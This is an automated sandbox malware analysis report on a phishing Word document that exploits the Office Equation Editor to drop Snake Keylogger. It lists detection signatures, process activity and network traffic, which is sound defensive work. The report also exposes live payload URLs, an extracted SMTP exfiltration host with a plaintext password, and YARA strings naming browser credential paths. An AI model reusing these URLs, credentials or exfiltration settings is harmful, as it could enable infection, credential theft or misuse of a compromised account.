Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OVER DUE INVOICE PAYMENT.docx

Overview

General Information

Sample name:OVER DUE INVOICE PAYMENT.docx
Analysis ID:1467922
MD5:9f3fd4e8aa2ad81966d0c2a036d1e901
SHA1:80a58393acb58fcc666e56b514994d98ba3f4716
SHA256:cd9cf022180c8c6f6c4fb0d76476bf2e9382128d28a4686114c50448934e5381
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: SCR File Write Event
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Screensaver Binary File Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2640 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3320 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • obi23456.scr (PID: 3376 cmdline: "C:\Users\user\AppData\Roaming\obi23456.scr" MD5: F7BDADAFF67E573F145D2E8E32E32CD8)
        • obi23456.scr (PID: 3404 cmdline: "C:\Users\user\AppData\Roaming\obi23456.scr" MD5: F7BDADAFF67E573F145D2E8E32E32CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2bfa2:$obj2: \objdata
  • 0x2bfba:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2bfa2:$obj2: \objdata
  • 0x2bfba:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
  • 0x4aa6b:$x1: In$J$ct0r
0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x14771:$a1: get_encryptedPassword
        • 0x14a5d:$a2: get_encryptedUsername
        • 0x1457d:$a3: get_timePasswordChanged
        • 0x14678:$a4: get_passwordField
        • 0x14787:$a5: set_encryptedPassword
        • 0x15d6d:$a7: get_logins
        • 0x15cd0:$a10: KeyLoggerEventArgs
        • 0x15969:$a11: KeyLoggerEventArgsEventHandler
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.obi23456.scr.31b7b70.6.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
        • 0x48c6b:$x1: In$J$ct0r
        9.2.obi23456.scr.32471f0.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          9.2.obi23456.scr.32471f0.7.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            9.2.obi23456.scr.32471f0.7.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12b71:$a1: get_encryptedPassword
            • 0x12e5d:$a2: get_encryptedUsername
            • 0x1297d:$a3: get_timePasswordChanged
            • 0x12a78:$a4: get_passwordField
            • 0x12b87:$a5: set_encryptedPassword
            • 0x1416d:$a7: get_logins
            • 0x140d0:$a10: KeyLoggerEventArgs
            • 0x13d69:$a11: KeyLoggerEventArgsEventHandler
            9.2.obi23456.scr.32471f0.7.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a411:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x19643:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19a76:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1aab5:$a5: \Kometa\User Data\Default\Login Data
            Click to see the 40 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3320, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\obi23456.scr", CommandLine: "C:\Users\user\AppData\Roaming\obi23456.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obi23456.scr, NewProcessName: C:\Users\user\AppData\Roaming\obi23456.scr, OriginalFileName: C:\Users\user\AppData\Roaming\obi23456.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3320, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obi23456.scr", ProcessId: 3376, ProcessName: obi23456.scr
            Sigma detected: SCR File Write Event
            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3320, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr
            Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
            Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\obi23456.scr, QueryName: checkip.dyndns.org
            Sigma detected: Suspicious Office Outbound Connections
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 2640, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 443
            Sigma detected: Suspicious Screensaver Binary File Creation
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3320, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2640, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2640, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://riell.top/obb.scrAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen
            Found malware configuration
            Source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587"}
            Multi AV Scanner detection for domain / URL
            Source: riell.topVirustotal: Detection: 5%Perma Link
            Source: https://riell.top/obb.scrVirustotal: Detection: 7%Perma Link
            Source: https://riell.top/obb.docVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrReversingLabs: Detection: 58%
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrVirustotal: Detection: 50%Perma Link
            Source: C:\Users\user\AppData\Roaming\obi23456.scrReversingLabs: Detection: 58%
            Source: C:\Users\user\AppData\Roaming\obi23456.scrVirustotal: Detection: 50%Perma Link
            Multi AV Scanner detection for submitted file
            Source: OVER DUE INVOICE PAYMENT.docxReversingLabs: Detection: 34%
            Source: OVER DUE INVOICE PAYMENT.docxVirustotal: Detection: 26%Perma Link
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\obi23456.scrJoe Sandbox ML: detected

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org

            Exploits

            barindex
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 188.114.97.3 Port: 443Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scr
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scrJump to behavior
            Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.drStream path '_1781631827/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: obi23456.scr, 00000009.00000002.374423269.0000000000460000.00000004.08000000.00040000.00000000.sdmp, obi23456.scr, 00000009.00000002.374657544.0000000002161000.00000004.00000800.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_001C5038
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 001C7B81h10_2_001C78C1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 001C5D07h10_2_001C5B18
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 001C6691h10_2_001C5B18
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 001C8143h10_2_001C7D30
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 001C6A01h10_2_001C6740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 001C72C1h10_2_001C7000
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_001C584B
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 001C8143h10_2_001C8072
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 001C6E61h10_2_001C6BA0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 001C7721h10_2_001C7460
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_001C566A
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F12D1h10_2_003F1028
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FC2D1h10_2_003FC028
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F9711h10_2_003F9468
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F46F1h10_2_003F4448
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F4B49h10_2_003F48A0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F1729h10_2_003F1480
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FC729h10_2_003FC480
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F4FA1h10_2_003F4CF8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F9B91h10_2_003F98E8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F1B81h10_2_003F18D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FCC15h10_2_003FC8D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F1FD9h10_2_003F1D30
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F53F9h10_2_003F5150
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F9FE9h10_2_003F9D40
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_003F79AE
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F5851h10_2_003F55A8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FA441h10_2_003FA198
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F2431h10_2_003F2188
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FA899h10_2_003FA5F0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F2889h10_2_003F25E0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F2CE1h10_2_003F2A38
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F5CA9h10_2_003F5A00
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FACF1h10_2_003FAA48
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FB149h10_2_003FAEA0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_003F7698
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F3139h10_2_003F2E90
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F3591h10_2_003F32E8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F05C9h10_2_003F0320
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FB5CAh10_2_003FB320
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F0A21h10_2_003F0778
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FBA21h10_2_003FB778
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F39E9h10_2_003F3740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F3E41h10_2_003F3B98
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F4299h10_2_003F3FF0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003F0E79h10_2_003F0BD0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 003FBE79h10_2_003FBBD0
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49180 -> 132.226.247.73:80
            Source: global trafficTCP traffic: 192.168.2.22:49182 -> 132.226.8.169:80
            Source: global trafficTCP traffic: 192.168.2.22:49184 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
